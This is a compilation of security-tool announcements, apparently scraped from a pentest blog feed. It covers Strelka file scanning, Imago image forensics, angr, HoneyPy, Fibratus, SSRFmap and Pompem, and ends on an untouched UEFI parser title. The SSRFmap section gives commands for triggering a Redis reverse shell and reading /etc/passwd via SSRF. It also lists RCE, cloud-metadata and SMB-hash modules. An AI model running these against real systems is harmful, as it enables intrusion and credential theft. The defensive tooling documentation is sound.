Strelka – Scanning Files At Scale With Python And ZeroMQ

Strelka is a real-time file scanning system used for threat hunting, threat detection, and incident response. Based on the design established by Lockheed Martin’s Laika BOSS and similar projects (see: related projects), Strelka’s purpose is to perform file extraction and metadata collection at huge scale.Strelka differs from its sibling projects in a few significant ways:Codebase is Python 3 (minimum supported version is 3.6)Designed for non-interactive, distributed systems (network security monitoring sensors, live response scripts, disk/memory extraction, etc.)Supports direct and remote file requests (Amazon S3, Google Cloud Storage, etc.) with optional encryption and authenticationUses widely supported networking, messaging, and data libraries/formats (ZeroMQ, protocol buffers, YAML, JSON)Built-in scan result logging and log management (compatible with Filebeat/ElasticStack, Splunk, etc.)Frequently Asked Questions”Who is Strelka?"Strelka is one of the second generation Soviet space dogs to achieve orbital spaceflight — the name is an homage to Lockheed Martin’s Laika BOSS, one of the first public projects of this type and from which Strelka’s core design is based."Why would I want a file scanning system?"File metadata is an additional pillar of data (alongside network, endpoint, authentication, and cloud) that is effective in enabling threat hunting, threat detection, and incident response and can help event analysts and incident responders bridge visibility gaps in their environment. This type of system is especially useful for identifying threat actors during KC3 and KC7. For examples of what Strelka can do, please read the use cases."Should I switch from my current file scanning system to Strelka?"It depends — we recommend reviewing the features of each and choosing the most appropriate tool for your needs. We believe the most significant motivating factors for switching to Strelka are:Modern codebase (Python 3.6+)More scanners (40+ at release) and file types (60+ at release) than related projectsSupports direct and remote file requestsBuilt-in encryption and authentication for client connectionsBuilt using libraries and formats that allow cross-platform, cross-language support"Are Strelka’s scanners compatible with Laika BOSS, File Scanning Framework, or Assemblyline?"Due to differences in design, Strelka’s scanners are not directly compatible with Laika BOSS, File Scanning Framework, or Assemblyline. With some effort, most scanners can likely be ported to the other projects."Is Strelka an intrusion detection system (IDS)?"Strelka shouldn’t be thought of as an IDS, but it can be used for threat detection through YARA rule matching and downstream metadata interpretation. Strelka’s design follows the philosophy established by other popular metadata collection systems (Bro, Sysmon, Volatility, etc.): it extracts data and leaves the decision-making up to the user."Does it work at scale?"Everyone has their own definition of "at scale," but we have been using Strelka and systems like it to scan up to 100 million files each day for over a year and have never reached a point where the system could not scale to our needs — as file volume and diversity increases, horizontally scaling the system should allow you to scan any number of files."Doesn’t this use a lot of bandwidth?"Yep! Strelka isn’t designed to operate in limited bandwidth environments, but we have experimented with solutions to this and there are tricks you can use to reduce bandwidth. These are what we’ve found most successful:Reduce the total volume of files sent to StrelkaUse a tracking system to only send unique files to Strelka (networked Redis servers are especially useful for this)Use traffic control (tc) to shape connections to Strelka"Should I run my Strelka cluster on my Bro/Suricata network sensor?"No! Strelka clusters run CPU-intensive processes that will negatively impact system-critical applications like Bro and Suricata. If you want to integrate a network sensor with Strelka, then use strelka_dirstream.py. This utility is capable of sending millions of files per day from a single network sensor to a Strelka cluster without impacting system-critical applications."I have other questions!"Please file an issue or contact the project team at TTS-CFC-OpenSource@target.com. The project lead can also be reached on Twitter at @jshlbrd.InstallationThe recommended operating system for Strelka is Ubuntu 18.04 LTS (Bionic Beaver) — it may work with earlier versions of Ubuntu if the appropriate packages are installed. We recommend using the Docker container for production deployments and welcome pull requests that add instructions for installing on other operating systems.Ubuntu 18.04 LTSUpdate packages and install build packagesapt-get update && apt-get install –no-install-recommends automake build-essential curl gcc git libtool make python3-dev python3-pip python3-wheelInstall runtime packagesapt-get install –no-install-recommends antiword libarchive-dev libfuzzy-dev libimage-exiftool-perl libmagic-dev libssl-dev python3-setuptools tesseract-ocr unrar upx jq Install pip3 packages pip3 install beautifulsoup4 boltons boto3 gevent google-cloud-storage html5lib inflection interruptingcow jsbeautifier libarchive-c lxml git+https://github.com/aaronst/macholibre.git olefile oletools pdfminer.six pefile pgpdump3 protobuf pyelftools pygments pyjsparser pylzma git+https://github.com/jshlbrd/pyopenssl.git python-docx git+https://github.com/jshlbrd/python-entropy.git python-keystoneclient python-magic python-swiftclient pyyaml pyzmq rarfile requests rpmfile schedule ssdeep tnefparse Install YARA curl -OL https://github.com/VirusTotal/yara/archive/v3.8.1.tar.gztar -zxvf v3.8.1.tar.gzcd yara-3.8.1/./bootstrap.sh./configure –with-crypto –enable-dotnet –enable-magicmake && make install && make checkecho "/usr/local/lib" >> /etc/ld.so.confldconfigInstall yara-pythoncurl -OL https://github.com/VirusTotal/yara-python/archive/v3.8.1.tar.gz tar -zxvf v3.8.1.tar.gz cd yara-python-3.8.1/ python3 setup.py build –dynamic-linking python3 setup.py install Create Strelka directories mkdir /var/log/strelka/ && mkdir /opt/strelka/ Clone this repository git clone https://github.com/target/strelka.git /opt/strelka/ Compile the Strelka protobuf cd /opt/strelka/server/ && protoc –python_out=. strelka.proto (Optional) Install the Strelka utilities cd /opt/strelka/ && python3 setup.py -q build && python3 setup.py -q install && python3 setup.py -q clean –allDocker Clone this repository git clone https://github.com/target/strelka.git /opt/strelka/ Build the container cd /opt/strelka/ && docker build -t strelka .QuickstartBy default, Strelka is configured to use a minimal "quickstart" deployment that allows users to test the system. This configuration is not recommended for production deployments. Using two Terminal windows, do the following:Terminal 1$ strelka.pyTerminal 2:$ strelka_user_client.py –broker 127.0.0.1:5558 –path $ cat /var/log/strelka/*.log | jq .Terminal 1 runs a Strelka cluster (broker, 4 workers, and log rotation) with debug logging and Terminal 2 is used to send file requests to the cluster and read the scan results.DeploymentUtilitiesStrelka’s design as a distributed system creates the need for client-side and server-side utilities. Client-side utilities provide methods for sending file requests to a cluster and server-side utilities provide methods for distributing and scanning files sent to a cluster.strelka.pystrelka.py is a non-interactive, server-side utility that contains everything needed for running a large-scale, distributed Strelka cluster. This includes:Capability to run servers in any combination of broker/workersBroker distributes file tasks to workersWorkers perform file analysis on tasksOn-disk scan result loggingConfigurable log rotation and managementCompatible with external log shippers (e.g. Filebeat, Splunk Universal Forwarder, etc.)Supports encryption and authentication for connections between clients and brokersSelf-healing child processes (brokers, workers, log management)This utility is managed with two configuration files: etc/strelka/strelka.yml and etc/strelka/pylogging.ini.The help page for strelka.py is shown below:usage: strelka.py [options]runs Strelka as a distributed cluster.optional arguments: -h, –help show this help message and exit -d, –debug enable debug messages to the console -c STRELKA_CFG, –strelka-config STRELKA_CFG path to strelka configuration file -l LOGGING_INI, –logging-ini LOGGING_INI path to python logging configuration filestrelka_dirstream.pystrelka_dirstream.py is a non-interactive, client-side utility used for sending files from a directory to a Strelka cluster in near real-time. This utility uses inotify to watch the directory and sends files to the cluster as soon as possible after they are written.Additionally, for select file sources, this utility can parse metadata embedded in the file’s filename and send it to the cluster as external metadata. Bro network sensors are currently the only supported file source, but other application-specific sources can be added.Using the utility with Bro requires no modification of the Bro source code, but it does require the network sensor to run a Bro script that enables file extraction. We recommend using our stub Bro script (etc/bro/extract-strelka.bro) to extract files. Other extraction scripts will also work, but they will not parse Bro’s metadata.This utility is managed with one configuration file: etc/dirstream/dirstream.yml.The help page for strelka_dirstream.py is shown below:usage: strelka_dirstream.py [options]sends files from a directory to a Strelka cluster in near real-time.optional arguments: -h, –help show this help message and exit -d, –debug enable debug messages to the console -c DIRSTREAM_CFG, –dirstream-config DIRSTREAM_CFG path to dirstream configuration filestrelka_user_client.pystrelka_user_client.py is a user-driven, client-side utility that is used for sending ad-hoc file requests to a cluster. This client should be used when file analysis is needed for a specific file or group of files — it is explicitly designed for users and should not be expected to perform long-lived or fully automated file requests. We recommend using this utility as an example of what is required in building new client utilities.Using this utility, users can send three types of file requests:Individual fileDirectory of filesRemote file (see: remote file requests)The help page for strelka_user_client.py is shown below:usage: strelka_user_client.py [options]sends ad-hoc file requests to a Strelka cluster.optional arguments: -h, –help show this help message and exit -d, –debug enable debug messages to the console -b BROKER, –broker BROKER network address and network port of the broker (e.g. 127.0.0.1:5558) -p PATH, –path PATH path to the file or directory of files to send to the broker -l LOCATION, –location LOCATION JSON representation of a location for the cluster to retrieve files from -t TIMEOUT, –timeout TIMEOUT amount of time (in seconds) to wait until a file transfer times out -bpk BROKER_PUBLIC_KEY, –broker-public-key BROKER_PUBLIC_KEY location of the broker Curve public key certificate (this option enables curve encryption and must be used if the broker has curve enabled) -csk CLIENT_SECRET_KEY, –client-secret-key CLIENT_SECRET_KEY location of the client Curve secret key certificate (this option enables curve encryption and must be used if the broker has curve enabled) -ug, –use-green determines if PyZMQ green should be used, which can increase performance at the risk of message lossgenerate_curve_certificates.pygenerate_curve_certificates.py is a utility used for generating broker and worker Curve certificates. This utility is required for setting up Curve encryption/authentication.The help page for generate_curve_certificates.py is shown below:usage: generate_curve_certificates.py [options]generates curve certificates used by brokers and clients.optional arguments: -h, –help show this help message and exit -p PATH, –path PATH path to store keys in (defaults to current working directory) -b, –broker generate curve certificates for a broker -c, –client generate curve certificates for a client -cf CLIENT_FILE, –client-file CLIENT_FILE path to a file containing line-separated list of clients to generate keys for, useful for creating many client keys at oncevalidate_yara.pyvalidate_yara.py is a utility used for recursively validating a directory of YARA rules files. This can be useful when debugging issues related to the ScanYara scanner.The help page for validate_yara.py is shown below:usage: validate_yara.py [options]validates YARA rules files.optional arguments: -h, –help show this help message and exit -p PATH, –path PATH path to directory containing YARA rules -e, –error boolean that determines if warnings should cause errorsConfiguration FilesStrelka uses YAML for configuring client-side and server-side utilities. We recommend using the default configurations and modifying the options as needed.Strelka Configuration (strelka.py)Strelka’s cluster configuration file is stored in etc/strelka/strelka.yml and contains three sections: daemon, remote, and scan.Daemon ConfigurationThe daemon configuration contains five sub-sections: processes, network, broker, workers, and logrotate.The "processes" section controls the processes launched by the daemon. The configuration options are:"run_broker": boolean that determines if the server should run a Strelka broker process (defaults to True)"run_workers": boolean that determines if the server should run Strelka worker processes (defaults to True)"run_logrotate": boolean that determines if the server should run a Strelka log rotation process (defaults to True)"worker_count": number of workers to spawn (defaults to 4)"shutdown_timeout": amount of time (in seconds) that will elapse before the daemon forcibly kills child processes after they have received a shutdown command (defaults to 45 seconds)The "network" section controls network connectivity. The configuration options are:"broker": network address of the broker (defaults to 127.0.0.1)"request_socket_port": network port used by clients to send file requests to the broker (defaults to 5558)"task_socket_port": network port used by workers to receive tasks from the broker (defaults to 5559)The "broker" section controls settings related to the broker process. The configuration options are:"poller_timeout": amount of time (in milliseconds) that the broker polls for client requests and worker statuses (defaults to 1000 milliseconds)"broker_secret_key": location of the broker Curve secret key certificate (enables Curve encryption, requires clients to use Curve, defaults to None)"client_public_keys": location of the directory containing client Curve public key certificates (enables Curve encryption and authentication, requires clients to use Curve, defaults to None)"prune_frequency": frequency (in seconds) at which the broker prunes dead workers (defaults to 5 seconds)"prune_delta": delta (in seconds) that must pass since a worker last checked in with the broker before it is considered dead and is pruned (defaults to 10 seconds)The "workers" section controls settings related to worker processes. The configuration options are:"task_socket_reconnect": amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 100ms plus jitter)"task_socket_reconnect_max": maximum amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 4000ms plus jitter)"poller_timeout": amount of time (in milliseconds) that workers poll for file tasks (defaults to 1000 milliseconds)"file_max": number of files a worker will process before shutting down (defaults to 10000)"time_to_live": amount of time (in minutes) that a worker will run before shutting down (defaults to 30 minutes)"heartbeat_frequency": frequency (in seconds) at which a worker sends a heartbeat to the broker if it has not received any file tasks (defaults to 10 seconds)"log_directory": location where worker scan results are logged to (defaults to /var/log/strelka/)"log_field_case": field case ("camel" or "snake") of the scan result log file data (defaults to camel)"log_bundle_events": boolean that determines if scan results should be bundled in single event as an array or in multiple events (defaults to True)The "logrotate" section controls settings related to the log rotation process. The configuration options are:"directory": directory to run log rotation on (defaults to /var/log/strelka/)"compression_delta": delta (in minutes) that must pass since a log file was last modified before it is compressed (defaults to 15 minutes)"deletion_delta": delta (in minutes) that must pass since a compressed log file was last modified before it is deleted (defaults to 360 minutes / 6 hours)Remote ConfigurationThe remote configuration contains one sub-section: remote.The "remote" section controls how workers retrieve files from remote file stores. Google Cloud Storage, Amazon S3, OpenStack Swift, and HTTP file stores are supported. All options in this configuration file are optionally read from environment variables if they are "null". The configuration options are:"remote_timeout": amount of time (in seconds) to wait before timing out individual file retrieval"remote_retries": number of times individual file retrieval will be re-attempted in the event of a timeout"google_application_credentials": path to the Google Cloud Storage JSON credentials file"aws_access_key_id": AWS access key ID"aws_secret_access_key": AWS secret access key"aws_default_region": default AWS region"st_auth_version": OpenStack authentication version (defaults to 3)"os_auth_url": OpenStack Keystone authentication URL"os_username": OpenStack username"os_password": OpenStack password"os_cert": OpenStack Keystone certificate"os_cacert": OpenStack Keystone CA Certificate"os_user_domain_name": OpenStack user domain"os_project_name": OpenStack project name"os_project_domain_name": OpenStack project domain"http_basic_user": HTTP Basic authentication username"http_basic_pass": HTTP Basic authentication password"http_verify": path to the CA bundle (file or directory) used for SSL verification (defaults to False, no verification)Scan ConfigurationThe scan configuration contains two sub-sections: distribution and scanners.The "distribution" section controls how files are distributed through the system. The configuration options are:"close_timeout": amount of time (in seconds) that a scanner can spend closing itself (defaults to 30 seconds)"distribution_timeout": amount of time (in seconds) that a single file can be distributed to all scanners (defaults to 1800 seconds / 30 minutes)"scanner_timeout": amount of time (in seconds) that a scanner can spend scanning a file (defaults to 600 seconds / 10 minutes, can be overridden per-scanner)"maximum_depth": maximum depth that child files will be processed by scanners"taste_mime_db": location of the MIME database used to taste files (defaults to None, system default)"taste_yara_rules": location of the directory of YARA files that contains rules used to taste files (defaults to etc/strelka/taste/)The "scanners" section controls which scanners are assigned to each file; each scanner is assigned by mapping flavors, filenames, and sources from this configuration to the file. "scanners" must always be a dictionary where the key is the scanner name (e.g. ScanZip) and the value is a list of dictionaries containing values for mappings, scanner priority, and scanner options.Assignment occurs through a system of positive and negative matches: any negative match causes the scanner to skip assignment and at least one positive match causes the scanner to be assigned. A unique identifier (*) is used to assign scanners to all flavors. See File Distribution, Scanners, Flavors, and Tasting for more details on flavors.Below is a sample configuration that runs the scanner "ScanHeader" on all files and the scanner "ScanRar" on files that match a YARA rule named "rar_file".scanners: ‘ScanHeader’: – positive: flavors: – ‘*’ priority: 5 options: length: 50 ‘ScanRar’: – positive: flavors: – ‘rar_file’ priority: 5 options: limit: 1000The "positive" dictionary determines which flavors, filenames, and sources cause the scanner to be assigned. Flavors is a list of literal strings while filenames and sources are regular expressions. One positive match will assign the scanner to the file.Below is a sample configuration that shows how RAR files can be matched against a YARA rule (rar_file), a MIME type (application/x-rar), and a filename (any that end with .rar).scanners: ‘ScanRar’: – positive: flavors: – ‘application/x-rar’ – ‘rar_file’ filename: ‘\.rar$’ priority: 5 options: limit: 1000Each scanner also supports negative matching through the "negative" dictionary. Negative matches occur before positive matches, so any negative match guarantees that the scanner will not be assigned. Similar to positive matches, negative matches support flavors, filenames, and sources.Below is a sample configuration that shows how RAR files can be positively matched against a YARA rule (rar_file) and a MIME type (application/x-rar), but only if they are not negatively matched against a filename (\.rar$). This configuration would cause ScanRar to only be assigned to RAR files that do not have the extension ".rar".scanners: ‘ScanRar’: – negative: filename: ‘\.rar$’ positive: flavors: – ‘application/x-rar’ – ‘rar_file’ priority: 5 options: limit: 1000Each scanner supports multiple mappings — this makes it possible to assign different priorities and options to the scanner based on the mapping variables. If a scanner has multiple mappings that match a file, then the first mapping wins.Below is a sample configuration that shows how a single scanner can apply different options depending on the mapping.scanners: ‘ScanX509’: – positive: flavors: – ‘x509_der_file’ priority: 5 options: type: ‘der’ – positive: flavors: – ‘x509_pem_file’ priority: 5 options: type: ‘pem’Python Logging Configuration (strelka.py)strelka.py uses an ini file (etc/strelka/pylogging.ini) to manage cluster-level statistics and information output by the Python logger. By default, this configuration file will log data to stdout and disable logging for packages imported by scanners.DirStream Configuration (strelka_dirstream.py)Strelka’s dirstream configuration file is stored in etc/dirstream/dirstream.yml and contains two sub-sections: processes and workers.The "processes" section controls the processes launched by the utility. The configuration options are:"shutdown_timeout": amount of time (in seconds) that will elapse before the utility forcibly kills child processes after they have received a shutdown command (defaults to 10 seconds)The "workers" section controls directory settings and network settings for each worker that sends files to the Strelka cluster. This section is a list; adding multiple directory/network settings makes it so multiple directories can be monitored at once. The configuration options are:"directory": directory that files are sent from (defaults to None)"source": application that writes files to the directory, used to control metadata parsing functionality (defaults to None)"meta_separator": unique string used to separate pieces of metadata in a filename, used to parse metadata and send it along with the file to the cluster (defaults to "S^E^P")"file_mtime_delta": delta (in seconds) that must pass since a file was last modified before it is sent to the cluster (defaults to 5 seconds)"delete_files": boolean that determines if files should be deleted after they are sent to the cluster (defaults to False)"broker": network address and network port of the broker (defaults to "127.0.0.1:5558")"timeout": amount of time (in seconds) to wait for a file to be successfully sent to the broker (defaults to 10)"use_green": boolean that determines if PyZMQ green should be used (this can increase performance at the risk of message loss, defaults to True)"broker_public_key": location of the broker Curve public key certificate (enables Curve encryption, must be used if the broker has Curve enabled)"client_secret_key": location of the client Curve secret key certificate (enables Curve encryption, must be used if the broker has Curve enabled)To enable Bro support, a Bro file extraction script must be run by the Bro application; Strelka’s file extraction script is stored in etc/bro/extract-strelka.bro and includes variables that can be redefined at Bro runtime. These variables are:"mime_table": table of strings (Bro source) mapped to a set of strings (Bro mime_type) — this variable defines which file MIME types Bro extracts and is configurable based on the location Bro identified the file (e.g. extract application/x-dosexec files from SMTP, but not SMB or FTP)"filename_re": regex pattern that can extract files based on Bro filename"unknown_mime_source": set of strings (Bro source) that determines if files of an unknown MIME type should be extracted based on the location Bro identified the file (e.g. extract unknown files from SMTP, but not SMB or FTP)"meta_separator": string used in extracted filenames to separate embedded Bro metadata — this must match the equivalent value in etc/dirstream/dirstream.yml"directory_count_interval": interval used to schedule how often the script checks the file count in the extraction directory"directory_count_threshold": int that is used as a trigger to temporarily disable file extraction if the file count in the extraction directory reaches the thresholdEncryption and AuthenticationStrelka has built-in, optional encryption and authentication for client connections provided by CurveZMQ.CurveZMQCurveZMQ (Curve) is ZMQ’s encryption and authentication protocol. Read more about it here.Using CurveStrelka uses Curve to encrypt and authenticate connections between clients and brokers. By default, Strelka’s Curve support is setup to enable encryption but not authentication.To enable Curve encryption, the broker must be loaded with a private key — any clients connecting to the broker must have the broker’s public key to successfully connect.To enable Curve encryption and authentication, the broker must be loaded with a private key and a directory of client public keys — any clients connecting to the broker must have the broker’s public key and have their client key loaded on the broker to successfully connect.The generate_curve_certificates.py utility can be used to create client and broker certificates.ClustersThe following are recommendations and considerations to keep in mind when deploying clusters.General RecommendationsThe following recommendations apply to all clusters:Do not run workers on the same server as a brokerThis puts the health of the entire cluster at risk if the server becomes over-utilizedDo not over-allocate workers to CPUs1 worker per CPUAllocate at least 1GB RAM per workerIf workers do not have enough RAM, then there will be excessive memory errorsBig files (especially compressed files) require more RAMIn large clusters, diminishing returns begin above 4GB RAM per workerAllocate as much RAM as reasonable to the brokerZMQ messages are stored entirely in memory — in large deployments with many clients, the broker may use a lot of RAM if the workers cannot keep up with the number of file tasksSizing ConsiderationsMultiple variables should be considered when determining the appropriate size for a cluster:Number of file requests per secondType of file requestsRemote file requests take longer to process than direct file requestsDiversity of files requestedBinary files take longer to scan than text filesNumber of YARA rules deployedScanning a file with 50,000 rules takes longer than scanning a file with 50 rulesThe best way to properly size a cluster is to start small, measure performance, and scale out as needed.Docker ConsiderationsBelow is a list of considerations to keep in mind when running a cluster with Docker containers:Share volumes, not files, with the containerStrelka’s workers will read configuration files and YARA rules files when they startup — sharing volumes with the container ensures that updated copies of these files on the localhost are reflected accurately inside the container without needing to restart the containerIncrease stop-timeout By default, Docker will forcibly kill a container if it has not stopped after 10 seconds — this value should be increased to greater than the shutdown_timeout value in etc/strelka/strelka.ymlIncrease shm-size By default, Docker limits a container’s shm size to 64MB — this can cause errors with Strelka scanners that utilize tempfileSet logging options By default, Docker has no log limit for logs output by a containerManagementDue to its distributed design, we recommend using container orchestration (e.g. Kubernetes) or configuration management/provisioning (e.g. Ansible, SaltStack, etc.) systems for managing clusters.Download Strelka

Link: http://feedproxy.google.com/~r/PentestTools/~3/J5e-Il60yXg/strelka-scanning-files-at-scale-with.html

Imago Forensics – Imago Is A Python Tool That Extract Digital Evidences From Images

Imago is a python tool that extract digital evidences from images recursively. This tool is useful throughout a digital forensic investigation. If you need to extract digital evidences and you have a lot of images, through this tool you will be able to compare them easily. Imago allows to extract the evidences into a CSV file or in a sqlite database. If in a JPEG exif are present GPS coordinates, Imago can extract the longitude and latitude and it can convert them to degrees and to retrieve relevant information like city, nation, zip code… Imago offers also the possibility to calculate Error Level Analysis, and to detect nudity these functionalities are in BETA.SetupSetup via pipInstall imago:$ pip install imagoOnce installed, one new binary should be available: :$ imago And then it should output the imago’s bannerRequirements:python 2.7exifread 2.1.2python-magic 0.4.15argparse 1.4.0pillow 5.2.0nudepy 0.4imagehash 4.0geopy 1.16.0Usageusage: imago.py [-h] -i INPUT [-x] [-g] [-e] [-n] [-d {md5,sha256,sha512,all}] [-p {ahash,phash,dhash,whash,all}] [-o OUTPUT] [-s] [-t {jpeg,tiff}]optional arguments: -h, –help show this help message and exit -i INPUT, –input INPUT Input directory path -x, –exif Extract exif metadata -g, –gps Extract, parse and convert to coordinates, GPS exif metadata from images (if any)It works only with JPEG. -e, –ela Extract, Error Level Analysis image,It works only with JPEG. *BETA* -n, –nude Detect Nudity, It works only with JPEG, *BETA* -d {md5,sha256,sha512,all}, –digest {md5,sha256,sha512,all} Calculate perceptual image hashing -p {ahash,phash,dhash,whash,all}, –percentualhash {ahash,phash,dhash,whash,all} Calculate hash digest -o OUTPUT, –output OUTPUT Output directory path -s, –sqli Keep SQLite file after the computation -t {jpeg,tiff}, –type {jpeg,tiff} Select the image, this flag can be JPEG or TIFF, if this argument it is not provided, imago will process all the image types(i.e. JPEG, TIFF)The only required argument is -i which is the base directory from which imago will start to search for image file. You should also provide at least one type of extraction (i.e. exif, data, gps, digest).Example:$ imago -i /home/solvent/cases/c23/DCIM/ -o /home/solvent/cases/c23/ -x -s -t jpeg -d allWhere:-i path: is the base directory, where imago will search for file-o path: the output directory where imago will save the CSV file, with the extracted metadata-x : imago will extract EXIF metadata.-s: the temporary SQLite database will not be deleted after the processing.-t jpeg: imago will search only for jpeg images.-d all: imago will calculate md5, sha256, sha512 for the jpeg images.Features: Functionality Status Recursive directory navigation ✔ file mtime (UTC) ✔ file ctime (UTC) ✔ file atime (UTC) ✔ file size (bytes) ✔ MIME type ✔ Exif support ✔ CSV export ✔ Sqlite export ✔ md5, sha256, sha512 ✔ Error Level Analysis ✔ BETA Full GPS support ✔ Nudity detection ✔ BETA Perceptual Image Hashing ✔ aHash ✔ pHash ✔ dHash ✔ wHash ✔ Download Imago-Forensics

Link: http://feedproxy.google.com/~r/PentestTools/~3/JzmwiCsLTtY/imago-forensics-imago-is-python-tool.html

Angr – A Powerful And User-Friendly Binary Analysis Platform

angr is a platform-agnostic binary analysis framework. It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.What?angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:Disassembly and intermediate-representation liftingProgram instrumentationSymbolic executionControl-flow analysisData-dependency analysisValue-set analysis (VSA)DecompilationThe most common angr operation is loading a binary: p = angr.Project(‘/bin/bash’) If you do this in an enhanced REPL like IPython, you can use tab-autocomplete to browse the top-level-accessible methods and their docstrings.The short version of “how to install angr" is mkvirtualenv –python=$(which python3) angr && python -m pip install angr.Exampleangr does a lot of binary analysis stuff. To get you started, here’s a simple example of using symbolic execution to get a flag in a CTF challenge.import angrproject = angr.Project("angr-doc/examples/defcamp_r100/r100", auto_load_libs=False)@project.hook(0x400844)def print_flag(state): print("FLAG SHOULD BE:", state.posix.dumps(0)) project.terminate_execution()project.execute()Quick StartInstall InstructionsDocumentation as HTML and as a Github repositoryDive right in: top-level-accessible methodsExamples using angr to solve CTF challenges.API ReferenceDownload Angr

Link: http://feedproxy.google.com/~r/PentestTools/~3/d91K9L2OVN8/angr-powerful-and-user-friendly-binary.html

HoneyPy – A Low To Medium Interaction Honeypot

A low interaction honeypot with the capability to be more of a medium interaction honeypot.HoneyPy is written in Python2 and is intended to be easy to:install and deployextend with plugins and loggersrun with custom configurationsFeel free to follow the QuickStart Guide to dive in directly. The main documentation can be found at the HoneyPy Docs site.Live HoneyPy data gets posted to:Twitter: https://twitter.com/HoneyPyLogWeb service endpoint and displayed via the HoneyDB web site: https://riskdiscovery.com/honeydbLeave an issue or feature request! Use the GitHub issue tracker to tell us whats on your mind.Pull requests are welcome! If you would like to create new plugins or improve existing ones, please do.NOTE: HoneyPy has primarily been tested and run on Debian and Ubuntu using Python 2.7.9.OverviewHoneyPy comes with a lot of plugins included. The level of interaction is determined by the functionality of the used plugin. Plugins can be created to emulate UDP or TCP based services to provide more interaction. All activity is logged to a file by default, but posting honeypot activity to Twitter or a web service endpoint can be configured as well.Examples:Plugins: ElasticSearchSIPetc.Loggers: HoneyDBTwitteretc.Download HoneyPy

Link: http://www.kitploit.com/2019/02/honeypy-low-to-medium-interaction.html

Fibratus – Tool For Exploration And Tracing Of The Windows Kernel

Fibratus is a tool which is able to capture the most of the Windows kernel activity – process/thread creation and termination, context switches, file system I/O, registry, network activity, DLL loading/unloading and much more. The kernel events can be easily streamed to a number of output sinks like AMQP message brokers, Elasticsearch clusters or standard output stream. You can use filaments (lightweight Python modules) to extend Fibratus with your own arsenal of tools and so leverage the power of the Python’s ecosystem.InstallationDownload the latest release (Windows installer). The changelog and older releases can be found here.Alternatively, you can get fibratus from PyPI.Install the dependenciesDownload and install Python 3.4.Install Visual Studio 2015 (you’ll only need the Visual C compiler to build the kstreamc extension). Make sure to export the VS100COMNTOOLS environment variable so it points to %VS140COMNTOOLS%.Get Cython: pip install Cython >=0.23.4.Install fibratus via the pip package manager:pip install fibratusDocumentationSee the wiki.Download Fibratus

Link: http://feedproxy.google.com/~r/PentestTools/~3/_sRsUUcl2vU/fibratus-tool-for-exploration-and.html

SSRFmap – Automatic SSRF Fuzzer And Exploitation Tool

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.Guide / RTFMBasic install from the Github repository.git clone https://github.com/swisskyrepo/SSRFmapcd SSRFmap/python3 ssrfmap.pyusage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [–lhost LHOST] [–lport LPORT] [–level LEVEL]optional arguments: -h, –help show this help message and exit -r REQFILE SSRF Request file -p PARAM SSRF Parameter to target -m MODULES SSRF Modules to enable -l HANDLER Start an handler for a reverse shell –lhost LHOST LHOST reverse shell –lport LPORT LPORT reverse shell –level [LEVEL] Level of test to perform (1-5, default: 1)The default way to use this script is the following.# Launch a portscan on localhost and read default filespython ssrfmap.py -r data/request.txt -p url -m readfiles,portscan# Triggering a reverse shell on a Redispython ssrfmap.py -r data/request.txt -p url -m redis –lhost=127.0.0.1 –lport=4242 -l 4242# -l create a listener for reverse shell on the specified port# –lhost and –lport work like in Metasploit, these values are used to create a reverse shell payload# –level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> …A quick way to test the framework can be done with data/example.py SSRF service.FLASK_APP=data/example.py flask run &python ssrfmap.py -r data/request.txt -p url -m readfilesModulesThe following modules are already implemented and can be used with the -m argument. Name Description fastcgi FastCGI RCE redis Redis RCE github Github Enterprise RCE < 2.8.7 zaddix Zaddix RCE mysql MySQL Command execution docker Docker Infoleaks via API smtp SMTP send mail portscan Scan ports for the host networkscan HTTP Ping sweep over the network readfiles Read files such as /etc/passwd alibaba Read files from the provider (e.g: meta-data, user-data) aws Read files from the provider (e.g: meta-data, user-data) digitalocean Read files from the provider (e.g: meta-data, user-data) socksproxy SOCKS4 Proxy smbhash Force an SMB authentication via a UNC Path Inspired byAll you need to know about SSRF and how may we write tools to do auto-detect - AuxyHow I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange TsaiBlog on Gopherus Tool -SpyD3rGopherus - GithubSSRF testing - cujanovicDownload SSRFmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/sNJOEPAhpEU/ssrfmap-automatic-ssrf-fuzzer-and.html

Pompem – Exploit and Vulnerability Finder

Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database …ScreenshotsSource codeYou can download the latest tarball by clicking here or latest zipball by clicking here.You can also download Pompem directly from its Git repository:$ git clone https://github.com/rfunix/Pompem.gitDependenciesPompem works out of the box with Python 3.5 on any platform and requires the following packages:Requests 2.9.1+InstallationGet Pompem up and running in a single command:$ pip3.5 install -r requirements.txtYou may greatly benefit from using virtualenv, which isolates packages installed for every project. If you have never used it, simply check [this tutorial] (http://docs.python-guide.org/en/latest/dev/virtualenvs) .UsageTo get the list of basic options and information about the project:$ python3.5 pompem.py -hOptions: -h, –help show this help message and exit -s, –search text for search –txt Write txt File –html Write html FileExamples of use:$ python3.5 pompem.py -s WordPress$ python3.5 pompem.py -s Joomla –html$ python3.5 pompem.py -s “Internet Explorer,joomla,wordpress" –html$ python3.5 pompem.py -s FortiGate –txt$ python3.5 pompem.py -s ssh,ftp,mysqlDownload Pompem

Link: http://www.kitploit.com/2019/02/pompem-exploit-and-vulnerability-finder.html

UEFI Firmware Parser – Parse BIOS/Intel ME/UEFI Firmware Related Structures: Volumes, FileSystems, Files, Etc

